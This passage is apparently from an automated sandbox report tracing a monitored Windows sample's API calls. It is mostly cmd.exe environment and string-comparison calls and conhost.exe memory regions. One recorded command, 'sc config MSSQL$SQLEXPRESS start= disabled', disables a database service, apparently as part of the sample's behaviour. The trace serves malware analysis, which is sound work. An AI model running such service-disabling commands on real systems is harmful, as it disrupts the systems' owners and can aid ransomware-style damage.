lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0127.621] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0127.621] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0127.621] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0127.621] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0127.621] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0127.621] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0127.621] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0127.621] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0127.621] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0127.621] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0127.621] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0127.621] GetEnvironmentStringsW () returned 0x4e47d98* [0127.621] FreeEnvironmentStringsA (penv="A") returned 1 [0127.621] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0127.621] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0127.621] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0127.621] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0127.621] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0127.621] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0127.621] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0127.621] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0127.621] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0127.622] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0127.622] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4dbf5dc | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0127.622] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x4dbf5dc, lpFilePart=0x4dbf5d4 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x4dbf5d4*="Desktop") returned 0x1d [0127.622] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0127.622] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x4dbf358 | out: lpFindFileData=0x4dbf358) returned 0x4e405c8 [0127.622] FindClose (in: hFindFile=0x4e405c8 | out: hFindFile=0x4e405c8) returned 1 [0127.622] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x4dbf358 | out: lpFindFileData=0x4dbf358) returned 0x4e405c8 [0127.622] FindClose (in: hFindFile=0x4e405c8 | out: hFindFile=0x4e405c8) returned 1 [0127.622] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0127.622] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x4dbf358 | out: lpFindFileData=0x4dbf358) returned 0x4e405c8 [0127.622] FindClose (in: hFindFile=0x4e405c8 | out: hFindFile=0x4e405c8) returned 1 [0127.622] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0127.622] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0127.622] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0127.622] GetEnvironmentStringsW () returned 0x4e47d98* [0127.622] FreeEnvironmentStringsA (penv="=") returned 1 [0127.622] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0127.623] GetConsoleOutputCP () returned 0x1b5 [0127.623] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0127.623] GetUserDefaultLCID () returned 0x409 [0127.623] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0127.623] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x4dbf70c, cchData=128 | out: lpLCData="0") returned 2 [0127.623] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x4dbf70c, cchData=128 | out: lpLCData="0") returned 2 [0127.623] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x4dbf70c, cchData=128 | out: lpLCData="1") returned 2 [0127.623] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0127.624] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0127.624] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0127.624] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0127.624] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0127.624] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0127.624] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0127.624] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0127.624] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0127.624] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0127.624] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0127.624] GetConsoleTitleW (in: lpConsoleTitle=0x4e4aa40, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0127.625] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0127.625] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0127.625] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0127.625] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0127.625] _wcsicmp (_String1="sc", _String2=")") returned 74 [0127.625] _wcsicmp (_String1="FOR", _String2="sc") returned -13 [0127.625] _wcsicmp (_String1="FOR/?", _String2="sc") returned -13 [0127.625] _wcsicmp (_String1="IF", _String2="sc") returned -10 [0127.625] _wcsicmp (_String1="IF/?", _String2="sc") returned -10 [0127.625] _wcsicmp (_String1="REM", _String2="sc") returned -1 [0127.625] _wcsicmp (_String1="REM/?", _String2="sc") returned -1 [0127.626] GetConsoleTitleW (in: lpConsoleTitle=0x4dbf3f8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0127.627] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0127.627] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0127.627] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0127.627] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0127.627] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0127.627] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0127.627] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0127.627] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0127.627] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0127.627] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0127.627] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0127.627] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0127.627] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0127.627] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0127.627] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0127.627] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0127.627] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0127.627] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0127.627] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0127.627] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0127.627] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0127.627] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0127.627] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0127.627] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0127.627] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0127.627] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0127.627] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0127.627] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0127.627] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0127.627] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0127.627] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0127.627] _wcsicmp (_String1="sc", _String2="START") returned -17 [0127.627] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0127.627] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0127.627] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0127.627] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0127.627] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0127.627] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0127.627] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0127.627] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0127.627] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0127.627] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0127.627] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0127.627] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0127.627] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0127.627] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0127.627] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0127.627] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0127.627] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0127.627] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0127.627] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0127.627] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0127.627] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0127.627] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0127.627] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0127.628] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0127.628] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0127.628] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0127.628] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0127.628] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0127.628] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0127.628] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0127.628] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0127.628] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0127.628] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0127.628] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0127.628] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0127.628] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0127.628] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0127.628] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0127.628] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0127.628] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0127.628] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0127.628] _wcsicmp (_String1="sc", _String2="START") returned -17 [0127.628] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0127.628] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0127.628] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0127.628] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0127.628] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0127.628] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0127.628] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0127.628] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0127.628] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0127.628] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0127.628] _wcsicmp (_String1="sc", _String2="FOR") returned 13 [0127.628] _wcsicmp (_String1="sc", _String2="IF") returned 10 [0127.628] _wcsicmp (_String1="sc", _String2="REM") returned 1 [0127.628] _wcsnicmp (_String1="sc", _String2="cmd ", _MaxCount=0x4) returned 16 [0127.628] SetErrorMode (uMode=0x0) returned 0x0 [0127.628] SetErrorMode (uMode=0x1) returned 0x0 [0127.628] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4e405d0, lpFilePart=0x4dbef04 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x4dbef04*="Desktop") returned 0x1d [0127.628] SetErrorMode (uMode=0x0) returned 0x1 [0127.629] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0127.629] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0127.636] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0127.636] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0127.636] GetConsoleTitleW (in: lpConsoleTitle=0x4dbf184, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0127.636] InitializeProcThreadAttributeList (in: lpAttributeList=0x4dbf0b0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x4dbf094 | out: lpAttributeList=0x4dbf0b0, lpSize=0x4dbf094) returned 1 [0127.636] UpdateProcThreadAttribute (in: lpAttributeList=0x4dbf0b0, dwFlags=0x0, Attribute=0x60001, lpValue=0x4dbf09c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x4dbf0b0, lpPreviousValue=0x0) returned 1 [0127.637] GetStartupInfoW (in: lpStartupInfo=0x4dbf0e8 | out: lpStartupInfo=0x4dbf0e8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0127.637] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0127.637] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0127.637] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0127.637] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0127.637] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0127.637] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0127.637] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0127.637] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0127.637] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0127.637] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0127.637] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0127.637] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0127.637] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0127.637] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0127.637] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0127.637] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0127.637] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0127.637] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0127.637] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0127.637] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0127.637] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0127.637] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0127.637] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0127.637] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0127.637] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0127.637] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0127.637] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0127.637] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0127.637] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0127.637] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0127.637] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0127.637] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0127.637] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0127.637] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0127.637] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0127.637] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0127.637] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0127.637] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0127.637] lstrcmpW (lpString1="\\sc.exe", lpString2="\\XCOPY.EXE") returned -1 [0127.638] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\sc.exe", lpCommandLine="sc config MSSQL$SQLEXPRESS start= disabled", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x4dbf038*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="sc config MSSQL$SQLEXPRESS start= disabled", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4dbf084 | out: lpCommandLine="sc config MSSQL$SQLEXPRESS start= disabled", lpProcessInformation=0x4dbf084*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xca8, dwThreadId=0xd10)) returned 1 [0127.644] CloseHandle (hObject=0xa4) returned 1 [0127.644] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0127.644] GetEnvironmentStringsW () returned 0x4e49f00* [0127.644] FreeEnvironmentStringsA (penv="=") returned 1 [0127.644] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0127.692] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x4dbf01c | out: lpExitCode=0x4dbf01c*=0x424) returned 1 [0127.692] CloseHandle (hObject=0xa8) returned 1 [0127.692] _vsnwprintf (in: _Buffer=0x4dbf104, _BufferCount=0x13, _Format="%08X", _ArgList=0x4dbf024 | out: _Buffer="00000424") returned 8 [0127.692] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000424") returned 1 [0127.692] GetEnvironmentStringsW () returned 0x4e4b388* [0127.692] FreeEnvironmentStringsA (penv="=") returned 1 [0127.692] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0127.692] GetEnvironmentStringsW () returned 0x4e4b388* [0127.692] FreeEnvironmentStringsA (penv="=") returned 1 [0127.692] DeleteProcThreadAttributeList (in: lpAttributeList=0x4dbf0b0 | out: lpAttributeList=0x4dbf0b0) [0127.692] _get_osfhandle (_FileHandle=1) returned 0x3c [0127.692] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0127.692] _get_osfhandle (_FileHandle=1) returned 0x3c [0127.692] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0127.693] _get_osfhandle (_FileHandle=0) returned 0x38 [0127.693] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0127.693] SetConsoleInputExeNameW () returned 0x1 [0127.693] GetConsoleOutputCP () returned 0x1b5 [0127.693] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0127.693] SetThreadUILanguage (LangId=0x0) returned 0x409 [0127.693] exit (_Code=1060) Thread: id = 381 os_tid = 0xcc4 Process: id = "96" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x24809000" os_pid = "0xde8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "95" os_parent_pid = "0xdb0" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5912 start_va = 0x7f998000 end_va = 0x7f998fff entry_point = 0x0 region_type = private name = "private_0x000000007f998000" filename = "" Region: id = 5913 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5914 start_va = 0xd562b10000 end_va = 0xd562b2ffff entry_point = 0x0 region_type = private name = "private_0x000000d562b10000" filename = "" Region: id = 5915 start_va = 0xd562b30000 end_va = 0xd562b43fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d562b30000" filename = "" Region: id = 5916 start_va = 0xd562b50000 end_va = 0xd562b8ffff entry_point = 0x0 region_type = private name = "private_0x000000d562b50000" filename = "" Region: id = 5917 start_va = 0x7df5ffb70000 end_va = 0x7ff5ffb6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffb70000" filename = "" Region: id = 5918 start_va = 0x7ff6c48c0000 end_va = 0x7ff6c48e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c48c0000" filename = "" Region: id = 5919 start_va = 0x7ff6c48e5000 end_va = 0x7ff6c48e5fff entry_point = 0x0 region_type = private name = "private_0x00007ff6c48e5000" filename = "" Region: id = 5920 start_va = 0x7ff6c48ee000 end_va = 0x7ff6c48effff entry_point = 0x0 region_type = private name = "private_0x00007ff6c48ee000" filename = "" Region: id = 5921 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 5922 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5923 start_va = 0xd562b10000 end_va = 0xd562b1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d562b10000" filename = "" Region: id = 5924 start_va = 0xd562b20000 end_va = 0xd562b26fff entry_point = 0x0 region_type = private name = "private_0x000000d562b20000" filename = "" Region: id = 5925 start_va = 0xd562b90000 end_va = 0xd562c4dfff entry_point = 0xd562b90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5926 start_va = 0xd562c50000 end_va = 0xd562c50fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d562c50000" filename = "" Region: id = 5927 start_va = 0xd562c60000 end_va = 0xd562c66fff entry_point = 0x0 region_type = private name = "private_0x000000d562c60000" filename = "" Region: id = 5928 start_va = 0xd562c70000 end_va = 0xd562c70fff entry_point = 0x0 region_type = private name = "private_0x000000d562c70000" filename = "" Region: id = 5929 start_va = 0xd562c80000 end_va = 0xd562d7ffff entry_point = 0x0 region_type = private name = "private_0x000000d562c80000" filename = "" Region: id = 5930 start_va = 0xd562d80000 end_va = 0xd562dbffff entry_point = 0x0 region_type = private name = "private_0x000000d562d80000" filename = "" Region: id = 5931 start_va = 0xd562dc0000 end_va = 0xd562dc0fff entry_point = 0x0 region_type = private name = "private_0x000000d562dc0000" filename = "" Region: id = 5932 start_va = 0xd562e90000 end_va = 0xd562e9ffff entry_point = 0x0 region_type = private name = "private_0x000000d562e90000" filename = "" Region: id = 5933 start_va = 0xd562ea0000 end_va = 0xd563027fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d562ea0000" filename = "" Region: id = 5934 start_va = 0xd563030000 end_va = 0xd5631b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d563030000" filename = "" Region: id = 5935 start_va = 0xd5631c0000 end_va = 0xd5645bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d5631c0000" filename = "" Region: id = 5936 start_va = 0x7ff6c47c0000 end_va = 0x7ff6c48bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c47c0000" filename = "" Region: id = 5937 start_va = 0x7ff6c48ec000 end_va = 0x7ff6c48edfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c48ec000" filename = "" Region: id = 5938 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 5939 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 5940 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = 